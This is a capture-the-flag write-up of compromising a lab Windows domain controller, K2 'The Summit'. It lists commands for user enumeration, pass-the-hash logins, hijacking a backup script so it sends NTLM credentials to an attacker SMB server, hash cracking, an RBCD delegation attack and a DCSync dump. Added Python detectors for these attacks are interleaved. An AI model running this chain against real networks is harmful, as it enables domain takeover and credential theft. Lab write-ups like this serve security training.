Finally, we reached The Summit, the final stage of the challenge. Using the Administrator hash from Middle Camp, we gained a foothold. By hijacking a script, we obtained a shell as another user. From there, we exploited our rights over the Domain Controller (DC) to perform a Resource-Based Constrained Delegation (RBCD) attack. This allowed us to escalate our privileges to the Administrator user and conquer the challenge.

Nmap

As always, we start off with an Nmap scan.

```plaintext
# Nmap 7.94SVN scan initiated Fri Oct 25 03:50:49 2024 as: nmap -sC -sV -vv -Pn -oN nmap 10.10.95.189
Nmap scan report for 10.10.95.189
Host is up, received user-set (0.21s latency).
Scanned at 2024-10-25 03:50:56 EDT for 75s
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2024-10-25 07:51:17Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: k2.thm0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: k2.thm0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| ssl-cert: Subject: commonName=K2RootDC.k2.thm
| Issuer: commonName=K2RootDC.k2.thm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-24T07:47:51
| Not valid after: 2025-04-25T07:47:51
| MD5: b044:9c0a:5dbf:a77f:52be:d266:6b01:d938
| SHA-1: 5f95:5d55:1f2a:e2b4:c765:7da4:478c:9903:f9b5:07b9
| -----BEGIN CERTIFICATE-----
| MIIC4jCCAcqgAwIBAgIQNw36DjGvAqZM80/6e+NNmjANBgkqhkiG9w0BAQsFADAa
| MRgwFgYDVQQDEw9LMlJvb3REQy5rMi50aG0wHhcNMjQxMDI0MDc0NzUxWhcNMjUw
| NDI1MDc0NzUxWjAaMRgwFgYDVQQDEw9LMlJvb3REQy5rMi50aG0wggEiMA0GCSqG
| SIb3DQEBAQUAA4IBDwAwggEKAoIBAQDOBS/TsMjg88f159X10Lft0VXSr4lKn0Z8
| PioJMepj6Im92T8FhWjhqNtYHfFyqLzO6J4Zr6VqF3VNJBk5g8IADMK3qA1KvEbX
| tFfLGeRjMLFTrkaW1ZbQzYAAXjPR2A6Oso7n16grp0IYgnrv3VRdc3i0XySG3GDG
| BeK84IzYSwglFTm4XDvtPkOGD6m3xtCgucXlJikYdTBbG6i53GjCL4/qbQ8R7DZ6
| DzR7TZFhlx7eoQp8zcn/XNhN2rpbfr2tUoxbsi4ioJjjrehNbWYu7Iuqgnm3FMcO
| vIcm7NZ6606H7cYaV31YyGVdleES44K95jSeLv4TKRte9idgP61lAgMBAAGjJDAi
| MBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsF
| AAOCAQEANaUxpStH5Ulfy2ZbBBRUbVfeHwTiBLxNCHs//uXFWL9G6lwN5JWzIpMe
| IJQilEH99fmiMJ5fcCyKNbGH22tmhOPjOH3ylqGDWQGqC9qJWdY7GZgWjid3aurU
| DRCVndU3FMQxM0wl2Md4AKnCwXb4H3MVXwo9y9N81ru2XE27h3R2SRahrOnsGEp0
| 4FETaPxU1U6yj+titjCLIhSuj4ZYs78voB7S3hh1BdVao4Z6BdcXeM7RX4DaH/tp
| a1mLlKyQI+kW/8Jt1IC8Pi1JWqmkDU7KCeYH1YBXKz5ZLVJwKcubT2g1XUxF07GD
| SY1nEjnxQZ0vmMIGXsdt33WisISg9g==
|_-----END CERTIFICATE-----
|_ssl-date: 2024-10-25T07:52:07+00:00; +1s from scanner time.
| rdp-ntlm-info:
| Target_Name: K2
| NetBIOS_Domain_Name: K2
| NetBIOS_Computer_Name: K2ROOTDC
| DNS_Domain_Name: k2.thm
| DNS_Computer_Name: K2RootDC.k2.thm
| DNS_Tree_Name: k2.thm
| Product_Version: 10.0.17763
|_ System_Time: 2024-10-25T07:51:28+00:00
Service Info: Host: K2ROOTDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2024-10-25T07:51:32
|_ start_date: N/A
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 36602/tcp): CLEAN (Timeout)
| Check 2 (port 50791/tcp): CLEAN (Timeout)
| Check 3 (port 20278/udp): CLEAN (Timeout)
| Check 4 (port 37262/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
```

Foothold

So far, we have identified three users, four passwords, and a hash. Let’s enumerate which of the users are valid.

```bash
kerbrute userenum -d k2.thm --dc 10.10.43.205  users

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 11/18/24 - Ronnie Flathers @ropnop

2024/11/18 11:55:52 > Using KDC(s):
2024/11/18 11:55:52 > 10.10.43.205:88

2024/11/18 11:55:52 > [+] VALID USERNAME: [email protected]
2024/11/18 11:55:52 > Done! Tested 3 usernames (1 valid) in 0.192 seconds
```

And we have a valid user.
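From the blue-team side, kerbrute's userenum leaves a clear trace: every name that does not exist is answered with KDC_ERR_C_PRINCIPAL_UNKNOWN, which the DC logs as event 4768 with result code 0x6. The following detector is an added example (not code from this write-up or from kerbrute) that counts those failures per client address over a sliding window; the event lines are constructed samples in a simplified key=value layout, which is an assumption made for the demo, since real events are XML.

```python
"""Detect Kerberos username enumeration from Windows event 4768.

Added example, not code from the original write-up. Event 4768 with
Status 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) means the requested account does
not exist; a burst of those from one client is the fingerprint of pre-auth
user enumeration. The lines below are constructed samples.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events: one host probes three names that do not exist
# and then hits a valid one; a second host just has a single typo.
SAMPLE_EVENTS = [
    "2024-11-18T11:55:52Z EventID=4768 TargetUserName=adm ClientAddress=::ffff:10.11.111.97 Status=0x6",
    "2024-11-18T11:55:52Z EventID=4768 TargetUserName=backup ClientAddress=::ffff:10.11.111.97 Status=0x6",
    "2024-11-18T11:55:52Z EventID=4768 TargetUserName=root ClientAddress=::ffff:10.11.111.97 Status=0x6",
    "2024-11-18T11:55:52Z EventID=4768 TargetUserName=j.smith ClientAddress=::ffff:10.11.111.97 Status=0x0",
    "2024-11-18T11:57:10Z EventID=4768 TargetUserName=j.smiht ClientAddress=::ffff:10.10.43.10 Status=0x6",
    "2024-11-18T11:58:00Z EventID=4771 TargetUserName=j.smith ClientAddress=::ffff:10.10.43.10 Status=0x18",
]


def parse_event(line):
    """Split one sample line into a dict; the timestamp becomes a datetime."""
    ts, *fields = line.split()
    event = dict(field.split("=", 1) for field in fields)
    event["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return event


def detect_enumeration(lines, threshold=3, window=timedelta(seconds=60)):
    """Return {client: [probed names]} for every client that produced at
    least `threshold` unknown-principal failures inside one `window`."""
    failures = defaultdict(list)
    for event in map(parse_event, lines):
        # 4771 (wrong password for an existing user) is a different signal.
        if event["EventID"] != "4768" or event["Status"].lower() != "0x6":
            continue
        client = event["ClientAddress"].replace("::ffff:", "")
        failures[client].append((event["ts"], event["TargetUserName"]))

    flagged = {}
    for client, events in failures.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Slide the window start forward until it fits the current event.
            while events[end][0] - events[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[client] = sorted({name for _, name in events})
                break
    return flagged


if __name__ == "__main__":
    for client, names in detect_enumeration(SAMPLE_EVENTS).items():
        print(f"possible user enumeration from {client}: {', '.join(names)}")
```

The threshold and window are tuning knobs; a single 0x6 from a workstation is usually a typo, while several within seconds from one address, followed by a successful request, is the pattern shown above.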

Let’s test the passwords we previously obtained.

```bash
netexec smb k2.thm -u j.smith -p passwords
SMB 10.10.43.205 445 K2ROOTDC [*] Windows 10 / Server 2019 Build 17763 x64 (name:K2ROOTDC) (domain:k2.thm) (signing:True) (SMBv1:False)
SMB 10.10.43.205 445 K2ROOTDC [-] k2.thm\j.smith:P[REDACTED]rC3! STATUS_LOGON_FAILURE
SMB 10.10.43.205 445 K2ROOTDC [-] k2.thm\j.smith:Rd[REDACTED]z3! STATUS_LOGON_FAILURE
SMB 10.10.43.205 445 K2ROOTDC [-] k2.thm\j.smith:vR[REDACTED]W!8 STATUS_LOGON_FAILURE
SMB 10.10.43.205 445 K2ROOTDC [-] k2.thm\j.smith:[REDACTED] STATUS_LOGON_FAILURE
```

Let’s test the Administrator hash that we obtained from Middle Camp.

```bash
netexec smb k2.thm -u j.smith -H "95[REDACTED]b32f"
SMB 10.10.43.205 445 K2ROOTDC [*] Windows 10 / Server 2019 Build 17763 x64 (name:K2ROOTDC) (domain:k2.thm) (signing:True) (SMBv1:False)
SMB 10.10.43.205 445 K2ROOTDC [+] k2.thm\j.smith:95[REDACTED]b32f
```

And it works: the password is reused, so the hash is valid for j.smith as well.

WinRM

Let’s connect using WinRM.

```bash
evil-winrm -i k2.thm -u j.smith -H "95[REDACTED]b32f"

*Evil-WinRM* PS C:\Users\j.smith\Documents> cd ..
*Evil-WinRM* PS C:\Users\j.smith> cd Desktop
*Evil-WinRM* PS C:\Users\j.smith\Desktop> ls


Directory: C:\Users\j.smith\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/21/2016 3:36 PM 527 EC2 Feedback.website
-a---- 6/21/2016 3:36 PM 554 EC2 Microsoft Windows Guide.website
```

Nothing interesting in the Desktop directory of j.smith.

Shell as o.armstrong

After some enumeration I found a non-standard directory in C:\ called Scripts. It contains a script called backup.bat.

Let’s see its content.

```powershell
*Evil-WinRM* PS C:\scripts> type backup.bat
copy C:\Users\o.armstrong\Desktop\notes.txt C:\Users\o.armstrong\Documents\backup_notes.txt
```

It seems to be a backup script, the kind of thing that is normally run as a scheduled job. It also seems to run in the o.armstrong context, since it copies files out of that user’s profile. So let’s try replacing it.

I will replace it with the code below:

```bash
cat backup.bat
net use \\10.11.111.97\share
```

Now I will start an SMB server on my Kali machine. When the script executes, the user o.armstrong will authenticate to my machine and I will get his NTLMv2 hash.

NTLMv2 (or more formally Net-NTLMv2) is a challenge-response authentication protocol that Windows clients use to authenticate to other Windows servers. For more information, see the linked blog post.
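The root cause here is a scheduled script that runs as one account while its file is writable by a less privileged one. An added defender-side audit follows (not code from this write-up): it takes each scheduled task's action path, parses `icacls` output for that path, and reports any principal outside the usual administrative set that holds a write-capable right on the script while the task runs as somebody else. The task list and the icacls output are constructed samples; the task name, the cleanup.bat entry and the ACLs are assumptions, not data from the lab.

```python
"""Find scheduled-task scripts that a low-privileged account can modify.

Added example, not code from the original write-up. On a real host the
task table would come from Get-ScheduledTask and the ACL text from
`icacls <path>`; both are constructed here so the audit runs offline.
"""
import re

# icacls rights that let a principal change the script or replace the file.
WRITE_TOKENS = {"F", "M", "W", "D", "WD", "AD", "WA", "WEA", "DC", "WDAC", "WO", "GA", "GW"}

# Principals expected to hold write access on system scripts.
TRUSTED = {"NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators",
           "NT SERVICE\\TrustedInstaller", "CREATOR OWNER"}

# Constructed: task name -> (account the task runs as, script it executes).
SAMPLE_TASKS = {
    "\\Backup Notes": ("K2\\o.armstrong", "C:\\Scripts\\backup.bat"),
    "\\Cleanup": ("NT AUTHORITY\\SYSTEM", "C:\\Scripts\\cleanup.bat"),
}

# Constructed icacls output per script path (first ACE shares the path line).
SAMPLE_ICACLS = {
    "C:\\Scripts\\backup.bat": """C:\\Scripts\\backup.bat K2\\j.smith:(M)
                      BUILTIN\\Administrators:(I)(F)
                      NT AUTHORITY\\SYSTEM:(I)(F)
                      BUILTIN\\Users:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
""",
    "C:\\Scripts\\cleanup.bat": """C:\\Scripts\\cleanup.bat BUILTIN\\Administrators:(I)(F)
                       NT AUTHORITY\\SYSTEM:(I)(F)
                       BUILTIN\\Users:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
""",
}


def parse_icacls(path, output):
    """Return [(principal, {permission tokens})] parsed from icacls output."""
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.startswith(path):
            line = line[len(path):].strip()
        principal, _, perms = line.partition(":(")
        groups = re.findall(r"\(([^)]*)\)", "(" + perms)
        tokens = {token.strip() for group in groups for token in group.split(",")}
        aces.append((principal, tokens))
    return aces


def untrusted_writers(path, output, trusted=TRUSTED):
    """Principals outside `trusted` with a write-capable right on `path`.
    Deny ACEs are skipped because they remove access rather than grant it."""
    return [principal for principal, tokens in parse_icacls(path, output)
            if principal not in trusted and "DENY" not in tokens and tokens & WRITE_TOKENS]


def audit_tasks(tasks, icacls_outputs):
    """Return (task, run_as, path, writers) for every task whose script can
    be modified by a non-trusted principal other than the task's own account."""
    findings = []
    for task, (run_as, path) in tasks.items():
        writers = [w for w in untrusted_writers(path, icacls_outputs[path]) if w != run_as]
        if writers:
            findings.append((task, run_as, path, writers))
    return findings


if __name__ == "__main__":
    for task, run_as, path, writers in audit_tasks(SAMPLE_TASKS, SAMPLE_ICACLS):
        print(f"{task} runs as {run_as} but {path} is writable by {', '.join(writers)}")
```

Inherited rights from the parent directory (the `(I)` flag) are treated the same as explicit ones, since a writable C:\Scripts folder is exactly what lets a user drop a replacement backup.bat.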

Starting the SMB server

```bash
impacket-smbserver share . -smb2support
```

Alternatively you can use Responder.

```bash
sudo responder -I tun0
```

Uploading backup.bat

```bash
*Evil-WinRM* PS C:\Scripts> upload backup.bat

Info: Uploading /home/kali/Desktop/THM/k2/The_summit/backup.bat to C:\Scripts\backup.bat

Data: 40 bytes of 40 bytes copied

Info: Upload successful!
```

After that, once the scheduled job ran, I got the NTLMv2 hash on my SMB server.

(screenshot: captured NTLMv2 hash of o.armstrong)

Cracking it with John the Ripper gives us the password.

```bash
john ntlm_hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
...
[REDACTED] (o.armstrong)
1g 0:00:00:03 DONE (2024-11-18 14:53) 0.3333g/s 3340Kp/s 3340Kc/s 3340KC/s arajos770418jara..ar681139
...
Session completed.
```

Now you can get user.txt in C:\Users\o.armstrong\Desktop.

BloodHound

After enumerating the system, I did not find anything interesting, so let’s enumerate the domain.

BloodHound setup

```bash
dnschef --fakeip <MACHINE_IP>
```

Run the BloodHound collector

```bash
bloodhound-python -u o.armstrong -p arMStronG08 -d k2.thm --zip -c All -dc K2RootDC.k2.thm -ns 127.0.0.1
```

You will get a zip file. Just upload it to BloodHound.

From BloodHound we see that the o.armstrong user is a member of the IT DIRECTOR group, which has GenericWrite over the DC computer object. That is enough to perform a Resource-Based Constrained Delegation (RBCD) attack.

(screenshot: BloodHound graph showing o.armstrong -> IT DIRECTOR -> GenericWrite -> K2ROOTDC)

If you want to read more about RBCD, see the linked article.

First, we need to create a computer account using Impacket’s addcomputer.py.

```bash
addcomputer.py -method SAMR -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host K2ROOTDC.K2.THM -domain-netbios K2.THM 'K2.THM/o.armstrong:ar[REDACTED]08'
```

Next, we use rbcd.py to write our newly created machine account into the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of K2ROOTDC$.

```bash
rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'K2ROOTDC$' -action 'write' 'K2.THM/o.armstrong:ar[REDACTED]08'
```

Now we can use getST.py to request a service ticket (TGS) for the CIFS/K2ROOTDC.K2.THM service as ATTACKERSYSTEM$, impersonating the Administrator user.

```bash
getST.py -spn 'cifs/k2rootdc.k2.thm' -impersonate 'Administrator' 'K2.THM/attackersystem$:Summer2018!'
```
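What rbcd.py actually wrote is a binary security descriptor in msDS-AllowedToActOnBehalfOfOtherIdentity, and that is also where a defender looks for it: any account listed there may impersonate users to the DC. The following is an added example (not code from this write-up or from Impacket) that decodes such a descriptor and reports every SID that is not on an approved list; build_rbcd_descriptor() only exists to construct a sample descriptor for the demonstration, and the domain SID, RIDs and "approved web server" are made up.

```python
"""Decode msDS-AllowedToActOnBehalfOfOtherIdentity and audit who may delegate.

Added example, not code from the original write-up or from Impacket. The
attribute is a self-relative SECURITY_DESCRIPTOR; each ACCESS_ALLOWED_ACE in
its DACL names an account allowed to act on behalf of other identities to
this computer. All SIDs below are constructed.
"""
import struct

ACCESS_ALLOWED_ACE_TYPE = 0x00
ACL_REVISION_DS = 0x04
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
SD_HEADER = "<BBHIIII"   # Revision, Sbz1, Control, OffOwner, OffGroup, OffSacl, OffDacl
ACL_HEADER = "<BBHHH"    # AclRevision, Sbz1, AclSize, AceCount, Sbz2
ACE_HEADER = "<BBHI"     # AceType, AceFlags, AceSize, AccessMask

# Constructed SIDs: a made-up domain, one approved delegating host and a
# freshly added machine account of the ATTACKERSYSTEM$ kind.
DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"
APPROVED_WEB_SERVER = DOMAIN_SID + "-1105"
NEW_MACHINE = DOMAIN_SID + "-1106"


def sid_to_bytes(sid):
    """Encode a textual SID (S-R-A-s1-s2-...) into its binary form."""
    parts = sid.split("-")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", revision, len(subs)) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(buf, offset):
    """Decode a binary SID at `offset`; return (text, encoded length)."""
    revision, count = struct.unpack_from("<BB", buf, offset)
    authority = int.from_bytes(buf[offset + 2:offset + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, offset + 8)
    return "S-%d-%d-%s" % (revision, authority, "-".join(map(str, subs))), 8 + 4 * count


def build_rbcd_descriptor(allowed_sids, owner_sid="S-1-5-32-544"):
    """Test fixture: a descriptor whose DACL grants each SID full access."""
    aces = b""
    for sid in allowed_sids:
        sid_bytes = sid_to_bytes(sid)
        aces += struct.pack(ACE_HEADER, ACCESS_ALLOWED_ACE_TYPE, 0,
                            8 + len(sid_bytes), 0x000F01FF) + sid_bytes
    acl = struct.pack(ACL_HEADER, ACL_REVISION_DS, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    owner = sid_to_bytes(owner_sid)
    off_owner = struct.calcsize(SD_HEADER)
    off_dacl = off_owner + len(owner)
    header = struct.pack(SD_HEADER, 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         off_owner, off_owner, 0, off_dacl)
    return header + owner + acl


def allowed_to_act_sids(descriptor):
    """SIDs of every ACCESS_ALLOWED ACE in the DACL. An absent attribute
    (empty value) means nobody is allowed to delegate to this computer."""
    if not descriptor:
        return []
    _, _, control, _, _, _, off_dacl = struct.unpack_from(SD_HEADER, descriptor, 0)
    if not (control & SE_DACL_PRESENT) or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from(ACL_HEADER, descriptor, off_dacl)
    pos = off_dacl + struct.calcsize(ACL_HEADER)
    sids = []
    for _ in range(ace_count):
        ace_type, _, ace_size, _ = struct.unpack_from(ACE_HEADER, descriptor, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sids.append(bytes_to_sid(descriptor, pos + struct.calcsize(ACE_HEADER))[0])
        pos += ace_size   # AceSize skips the whole ACE, whatever its type
    return sids


def audit_rbcd(descriptor, approved):
    """SIDs allowed to delegate that are not on the approved list."""
    return [sid for sid in allowed_to_act_sids(descriptor) if sid not in approved]


if __name__ == "__main__":
    sample = build_rbcd_descriptor([APPROVED_WEB_SERVER, NEW_MACHINE])
    print("unexpected delegation rights:", audit_rbcd(sample, {APPROVED_WEB_SERVER}))
```

Run periodically against every computer object (and especially domain controllers, which normally have this attribute empty), a non-empty result is a high-confidence signal; the 4742 "computer account was changed" event on the DC is the matching real-time trigger.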

Shell as Administrator

Now we can perform a DCSync with the obtained ticket to get the NTLM hash of the Administrator.

First, set the KRB5CCNAME environment variable to the ticket file saved by getST.py.

```bash
export KRB5CCNAME=Administrator.ccache
```

Finally, we can use secretsdump with the obtained ticket to dump the hashes from the DC.

```bash
secretsdump.py -k -no-pass 'K2.THM/[email protected]'
```
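The DCSync above is a directory replication request, and with "Audit Directory Service Access" enabled the DC records it as event 4662 whose Properties carry the replication control-access GUIDs; only domain controllers and a few known replication accounts should ever request them. The detector below is an added example (not code from this write-up or from Impacket) that flags such requests from any other subject; the events are constructed samples in already-parsed dict form, which is an assumption made for the demo, and the GUID in the third event is made up.

```python
"""Flag DCSync-style replication requests in Windows event 4662.

Added example, not code from the original write-up. The three GUIDs are the
real DS-Replication control-access rights; everything else here is constructed.
"""
import re

REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100   # AccessMask bit set for extended (control-access) rights
GUID_RE = re.compile(r"\{?([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\}?", re.I)

# Constructed sample 4662 events: the DC replicating normally, a user account
# pulling secrets, and an unrelated read of a made-up property.
SAMPLE_4662 = [
    {"SubjectUserName": "K2ROOTDC$", "SubjectDomainName": "K2", "AccessMask": "0x100",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "Administrator", "SubjectDomainName": "K2", "AccessMask": "0x100",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "o.armstrong", "SubjectDomainName": "K2", "AccessMask": "0x10",
     "Properties": "%%7685 {12345678-1234-1234-1234-123456789abc}"},
]


def replication_rights_requested(event):
    """Names of the replication rights present in the event's Properties,
    or [] when the access was not a control-access request at all."""
    if (int(event["AccessMask"], 16) & CONTROL_ACCESS) == 0:
        return []
    return [REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(event["Properties"])
            if g.lower() in REPLICATION_RIGHTS]


def flag_dcsync(events, domain_controllers, allowlist=()):
    """Return (DOMAIN\\user, [rights]) for replication requests made by a
    subject that is neither a DC machine account nor on the allowlist."""
    dc_accounts = {dc.upper() for dc in domain_controllers}
    findings = []
    for event in events:
        rights = replication_rights_requested(event)
        if not rights:
            continue
        subject = "%s\\%s" % (event["SubjectDomainName"], event["SubjectUserName"])
        if event["SubjectUserName"].upper() in dc_accounts or subject in allowlist:
            continue
        findings.append((subject, rights))
    return findings


if __name__ == "__main__":
    for subject, rights in flag_dcsync(SAMPLE_4662, {"K2ROOTDC$"}):
        print(f"replication request by {subject}: {', '.join(rights)}")
```

In this lab the request is signed as Administrator, so an allowlist of "Domain Admins may replicate" would hide it; the safer baseline is DC computer accounts plus the specific service accounts (Azure AD Connect style) that are known to need these rights.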

We can use the retrieved hash to authenticate as Administrator using evil-winrm.

```bash
evil-winrm -i k2rootdc.k2.thm -u 'Administrator' -H 15ec[REDACTED]4b90
```